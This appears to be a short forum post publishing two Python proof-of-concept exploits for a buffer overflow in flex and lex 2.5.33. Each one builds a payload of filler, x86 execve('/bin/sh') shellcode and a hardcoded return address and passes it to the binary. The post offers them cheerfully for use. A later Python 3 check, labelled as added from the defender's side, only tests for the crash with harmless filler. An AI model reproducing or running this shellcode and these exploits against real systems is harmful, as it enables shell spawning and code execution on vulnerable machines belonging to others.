I was testing some old bugs in one old distro, and that's how I found a SIGSEGV in flex (2.5.33).
Below is the proof of concept:
---
#!/usr/bin/env python
# -------------------------
# 0day poc for flex 2.5.33
#
from subprocess import call
flex = '/usr/bin/flex'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*2165
ret = "\xc0\xfb\xff\xbf"
payload = nops + shellcode + ret
call([flex,payload])
print 'Done\n\n'
---
The second one is pretty similar (this time for the /usr/bin/lex binary):
---
#!/usr/bin/env python
# -------------------------
# 0day poc for lex 2.5.33
# 28.04.2015
#
from subprocess import call
lex = '/usr/bin/lex'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "\x90"*2165
ret = "\x80\xfb\xff\xbf"
payload = nops + shellcode + ret
call([lex,payload])
print 'Done\n\n'
---
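As an added check from the defender's side (not part of the original post): a Python 3 script that runs the installed flex and lex with a single over-long argument made only of "A"s (no shellcode, no return address) and reports whether the process died with SIGSEGV, so an administrator can tell whether a build is affected before patching. The binary paths and the 2200-byte probe length are assumptions.

```python
#!/usr/bin/env python3
# Added triage check, not part of the original post: asks whether the
# flex/lex build on this box crashes when handed an over-long argument.
# The probe is plain "A"s; it only detects the SIGSEGV the post describes.
# Binary paths and the probe length (a bit over the PoC's 2165-byte
# filler) are assumptions.
import os
import signal
import subprocess

PROBE_LENGTH = 2200          # assumption: slightly above the PoC's 2165
TARGETS = ["/usr/bin/flex", "/usr/bin/lex"]   # assumption: distro paths


def classify_exit(returncode):
    """Map a subprocess return code to a (verdict, detail) pair.

    subprocess reports death-by-signal as a negative code (-N for signal N);
    a non-negative code means the program exited on its own.
    """
    if returncode < 0:
        name = signal.Signals(-returncode).name
        fault = -returncode in (int(signal.SIGSEGV), int(signal.SIGBUS))
        return ("CRASH" if fault else "KILLED", name)
    return ("OK", "exit %d" % returncode)


def probe(binary, length=PROBE_LENGTH, timeout=10):
    """Run `binary` with one over-long argument and classify how it ended."""
    if not os.access(binary, os.X_OK):
        return ("SKIP", "not installed")
    try:
        proc = subprocess.run([binary, "A" * length],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL,
                              timeout=timeout)
    except subprocess.TimeoutExpired:
        return ("HANG", "timeout")
    return classify_exit(proc.returncode)


if __name__ == "__main__":
    # A CRASH verdict means the installed build still has the overflow.
    for target in TARGETS:
        verdict, detail = probe(target)
        print("%-14s %-6s %s" % (target, verdict, detail))
```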
Enjoy ;)
o/